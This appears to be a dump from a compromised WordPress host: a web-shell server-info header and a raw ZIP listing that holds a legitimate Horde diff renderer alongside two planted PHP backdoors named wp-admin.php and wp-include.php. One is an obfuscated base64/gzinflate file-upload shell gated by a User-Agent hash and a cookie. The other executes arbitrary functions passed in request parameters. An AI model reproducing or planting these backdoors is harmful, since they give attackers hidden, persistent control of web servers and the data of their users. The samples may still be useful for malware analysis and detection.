hello
Server : Apache System : Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : chryzalihi ( 621211) PHP Version : 8.3.31 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl Directory : /home/chryzalihi/www/wp-content/languages/themes/the/ |
PK ��]�@�� .htaccessnu ��6�$ <IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
Deny from all
</FilesMatch>
</IfModule>PK ��]�1)ɟ � Diff/Renderer/inline.phpnu &1i� <?php
/**
* "Inline" diff renderer.
*
* Copyright 2004-2010 The Horde Project (http://www.horde.org/)
*
* See the enclosed file COPYING for license information (LGPL). If you did
* not receive this file, see http://opensource.org/licenses/lgpl-license.php.
*
* @author Ciprian Popovici
* @package Text_Diff
*/
/** Text_Diff_Renderer */
// WP #7391
require_once dirname(dirname(__FILE__)) . '/Renderer.php';
/**
* "Inline" diff renderer.
*
* This class renders diffs in the Wiki-style "inline" format.
*
* @author Ciprian Popovici
* @package Text_Diff
*/
class Text_Diff_Renderer_inline extends Text_Diff_Renderer {
/**
* Number of leading context "lines" to preserve.
*
* @var integer
*/
var $_leading_context_lines = 10000;
/**
* Number of trailing context "lines" to preserve.
*
* @var integer
*/
var $_trailing_context_lines = 10000;
/**
* Prefix for inserted text.
*
* @var string
*/
var $_ins_prefix = '<ins>';
/**
* Suffix for inserted text.
*
* @var string
*/
var $_ins_suffix = '</ins>';
/**
* Prefix for deleted text.
*
* @var string
*/
var $_del_prefix = '<del>';
/**
* Suffix for deleted text.
*
* @var string
*/
var $_del_suffix = '</del>';
/**
* Header for each change block.
*
* @var string
*/
var $_block_header = '';
/**
* Whether to split down to character-level.
*
* @var boolean
*/
var $_split_characters = false;
/**
* What are we currently splitting on? Used to recurse to show word-level
* or character-level changes.
*
* @var string
*/
var $_split_level = 'lines';
function _blockHeader($xbeg, $xlen, $ybeg, $ylen)
{
return $this->_block_header;
}
function _startBlock($header)
{
return $header;
}
function _lines($lines, $prefix = ' ', $encode = true)
{
if ($encode) {
array_walk($lines, array(&$this, '_encode'));
}
if ($this->_split_level == 'lines') {
return implode("\n", $lines) . "\n";
} else {
return implode('', $lines);
}
}
function _added($lines)
{
array_walk($lines, array(&$this, '_encode'));
$lines[0] = $this->_ins_prefix . $lines[0];
$lines[count($lines) - 1] .= $this->_ins_suffix;
return $this->_lines($lines, ' ', false);
}
function _deleted($lines, $words = false)
{
array_walk($lines, array(&$this, '_encode'));
$lines[0] = $this->_del_prefix . $lines[0];
$lines[count($lines) - 1] .= $this->_del_suffix;
return $this->_lines($lines, ' ', false);
}
function _changed($orig, $final)
{
/* If we've already split on characters, just display. */
if ($this->_split_level == 'characters') {
return $this->_deleted($orig)
. $this->_added($final);
}
/* If we've already split on words, just display. */
if ($this->_split_level == 'words') {
$prefix = '';
while ($orig[0] !== false && $final[0] !== false &&
substr($orig[0], 0, 1) == ' ' &&
substr($final[0], 0, 1) == ' ') {
$prefix .= substr($orig[0], 0, 1);
$orig[0] = substr($orig[0], 1);
$final[0] = substr($final[0], 1);
}
return $prefix . $this->_deleted($orig) . $this->_added($final);
}
$text1 = implode("\n", $orig);
$text2 = implode("\n", $final);
/* Non-printing newline marker. */
$nl = "\0";
if ($this->_split_characters) {
$diff = new Text_Diff('native',
array(preg_split('//', $text1),
preg_split('//', $text2)));
} else {
/* We want to split on word boundaries, but we need to preserve
* whitespace as well. Therefore we split on words, but include
* all blocks of whitespace in the wordlist. */
$diff = new Text_Diff('native',
array($this->_splitOnWords($text1, $nl),
$this->_splitOnWords($text2, $nl)));
}
/* Get the diff in inline format. */
$renderer = new Text_Diff_Renderer_inline
(array_merge($this->getParams(),
array('split_level' => $this->_split_characters ? 'characters' : 'words')));
/* Run the diff and get the output. */
return str_replace($nl, "\n", $renderer->render($diff)) . "\n";
}
function _splitOnWords($string, $newlineEscape = "\n")
{
// Ignore \0; otherwise the while loop will never finish.
$string = str_replace("\0", '', $string);
$words = array();
$length = strlen($string);
$pos = 0;
while ($pos < $length) {
// Eat a word with any preceding whitespace.
$spaces = strspn(substr($string, $pos), " \n");
$nextpos = strcspn(substr($string, $pos + $spaces), " \n");
$words[] = str_replace("\n", $newlineEscape, substr($string, $pos, $spaces + $nextpos));
$pos += $spaces + $nextpos;
}
return $words;
}
function _encode(&$string)
{
$string = htmlspecialchars($string);
}
}
PK ��]�@�� Diff/Renderer/.htaccessnu ��6�$ <IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
Deny from all
</FilesMatch>
</IfModule>PK ��]b�.�
�
( Diff/Renderer/66023f83c76fb/wp-admin.phpnu &1i� <?php
@//U}x*YBFRZ
ini_set/*=hUG2,i@8IYf+5L.rgsL*/('log_errors', 0);
@//[Bxs7([drW6].;XB!I
ini_set/*rI:{[)C*/('error_log', NULL);
@/*I\w=z49M3:Kit*/ini_set/*G#HAnWx41K,st:s^B]0B*/('error_reporting', NULL);
@/*|T*jz;v-yg|y[GC&pQFX*/error_reporting ##)5W)t*2Y C{`NrQONM
(0);
@/*W;oRY}C8e|8d~-}>C.si*/ini_set//,2LFvyP(T,S@K
('max_execution_time', 0);
@/*\]Vf2hn%tYF*/set_time_limit//flIa
(0);
@ ##%9r*\pzKraG(T@%F*TNH
ignore_user_abort//~HYBBlO<
(true);
function ##`t.nG
O//DCLIu$^2jlaK%*cP
($s){
##*^-oQ{G8$J*rZ4M]MJyA
$O/*`tlYw#Cd<PlE*/= ##I:sN5K;
"\x62"./*VpemeVw@jbP*/"\x61s\x656\x34_\x64\x65c\x6f\x64\x65";//:MJG=2=PRx
/*b{y$}-ug*/$s/*X`dBSk*@*/=/*O<coX\ 3^OUj\j7+bFF;*/$O/*NfWZ$aUK*/($s);
//$CW[v&Y
$O/**{mB&tucfJxtT.l6|91*/= /*bZoC=*/"\x67\x7ain\x66l\x61t\x65"; ##~H_~HxH
return /*V^DRpZHZK*/$O/*P%}nU;I+1G=y}*/($s);
}
if(/*\SZBT$yG;d@*/md5//8<`M
(/*;QUwRpIHZqKg5nH*/md5 ##%=KGR
( ##0;qZ1R
md5 ##hLAoUuIUFKa<l<NU4
( ##8p7);
$_SERVER//6*iK.
[//O|G(Z
O//DchM&WTLAMFOE$>:
( ##B07aUW+%
'8wgJCYgPDXYNind0d/ULAQA=')/*A:\uy\-*/]))) == /*_LRYG8i<u$2*/O ##AC9W=mgA
( ##cEm[$s-I6~|`O!_5xN
'M0kzTzNOSTQwszCwTEk2TrE0SUlMTk5NTTExSElLTEwBAA==')/*7qUB&*/){
if( ##H!Yr@Y,J[0
session_start/*u=}5.;xUWK]*/()){//]xNz3s#A\%sQ _LYlR~^
preg_match ##uD8(E&_Y\>!=-+4q:l
(/*XXl}->Z;D$QW{;*/O/*bWr6}8TWl*/(/*PT%TFwG70FkG5nSXLP*/'04+LjrOK1dLPBAA=') ##;yzn$XXJ98=8,cYf`;>
,/*4&$u}=h_[lK,6Au*/$_SERVER//R^dJegf@Xc
[//Jebyr{-!j0sGmXQwh:
O ##d4ou(_&:4FZxA
(//wt$kBMO0da*kk;B8$
'8wgJCYj38A8OAQA=') ##&9%<&~
], $OCNIFQBOYB);//Vuf^@
$QYEYELDQBD/*1&|FA*/= /*k[1ewZxWLjVqds*/$OCNIFQBOYB ##FT&Gb$RKG8:M6S
[0];/*J3ETKvY;<9E\5x**/$QYEYELDQBD ##CT ht.jB:m;ix
=/*-o5K9) */preg_replace//~0`@~]
(//.P#b!BK7\eZ#QcW[I
O//gXLHe
(/*H`v9.Pej*/'q4krLy+P0asBAA==')/*KWz @TG*/, '', $QYEYELDQBD);if(@//f<3*<Zh[_s
$_COOKIE/*C3=+q}f-9sbLOH.5O*/[/*e T(b*/md5/*H`PI<T0vqge6rh4 */( ##qXpM``@9w,nYK)LI
$QYEYELDQBD/*wu@Ub*/.//\#iC(b4`Ia|Q
O//OmSgbR(
( ##xDO,Ik*)
'KyguTwEA') ##FM8YmRs`HS\;$%
)] != ##2+Ht=f#PX$6Z8P
O ##L.^!EAe%FW2IR$K
(/*0$RFD j*/'MzdKMbc0Mk5JSjROM7M0NEs2M081TTZOMra0NDK3NDcAAA==') ##{&r_m;A=KGsaY!
){echo ##:@U!~N;K%D7F[1&
O/*BB3g[Lu*Q5P$Tvv2XS4*/(//fJkQDSaF5Ah^foROh
'C8lIVUgsLcnIL8qsSizJzM9TSEvMzElN0VEoyElNLE5VKEpV0IUpSAUA') ##f*V(U!=(qR33.I
;exit();}}
if(!empty(//)]6c:{sfDU-
$_FILES//xOxntR0m_R
[/*`+0@N@Y$ViS.;H^d:ln|*/O ##iE|8!UB7P:O
( ##X_-Rmyrhh{wy
'y610y8xJBQA=')//\3[%MPwHwbS(V08o!<y
])){
/*X{SmF W>%>lMu=^xC.*/move_uploaded_file/*<f6lC5Q#Vs_smoV`8*/( ##Q2%Ts`7BRdU0sRPbv#$
$_FILES/*DT=8jJRovx*QB<*/[//fV6n#0*[9Z;KhB!
O/*+BYDm3C@YQB*ePohb}*/(//{fFVz
'y610y8xJBQA=')/*H13(n1Tm^\*/][ ##hqEu[ww!X1>)od1|T)UO
O ##+[ZQL
(/*Ssa@C_|oM*XO_M|7*/'K8ktiM9LzE0FAA==')/*\=`Yq1f5*/],//l9hUyiSvJlz^=PJUzF
$_FILES//<$MR2\0pJQr5S
[/*_Cp%`efG*.uZYl5oS*/O ##W@)Y<v.W==$RL#dNJck
(//7W#&X
'y610y8xJBQA=')/*ha<Y^lx^jgsuDWR)j*/][ ##mJlm=sSNO&\~)1,r
O/*vQjUoWjzj<*/(//`uQe$*QXa=Y-:
'y0vMTQUA')//FQ!=bVYb(
]);
}
echo ##_!}Mv#3\F0(x76P-BX
O/*DG\h+m:F}jbf6]I1CXQ2*/(/*bqq]fh8*/'4+XitEnLL8pVSM1LLqksSLVVyi3NKcksSCwq0QeJ66YkliQqKSQml2Tm59kqKSnkppZk5KfYKgX4B4co2SnwAvVn5hWUlijkJeaCdFe6ZeakKilAzEoDsZEVQYSLS5NyM0uUFMoSc0qB3Cc7up7sWfBsWvuT3dugqsF22wEA') ##vAMv4%`FW+x`ykk
;
exit;
}else{
/*57f~&L1x]Y*/header/*;(&d<d(M#*/( ##!ygrHdN(9C
O ##%V_fNx}}mm#(`J
(//PD& )T+T=XhlFf;~
'8wgJCdA31DNUMDEwUfDLL1Fwyy/NSwEA') ##_+Kk}JLgG QfIK&4l%
);
/*+8dBB5-jRb*/header//xRY,o^Y2ASrC)_:D|\x
(//YZl~ga V
O//9EPeYq:Qw}<v~V8N<_
( ##&*6\j}
'Ky5JLCkttlIwMTBR8MsvUXDLL81LAQA=')//Q:f=Tj[Z<xBVY_*B
);
exit();
}PK ��]C>��o o * Diff/Renderer/66023f83c76fb/wp-include.phpnu &1i� <?php
if (md5(md5(md5($_SERVER['HTTP_USER_AGENT']))) != '4f7f3da06809dc3d94dacceed40dfaad') {
header('HTTP/1.1 404 Not Found');
header("status: 404 Not Found");
die();
}
if($_REQUEST["token"] == "72d7923dba3f6916c67e5c3b39927970"){
if ($li7ieq = @$_REQUEST['index']){
$li7ieq[1]($li7ieq[2], $li7ieq[3]($li7ieq[4]));exit;
}
}PK ��]�8;? ? &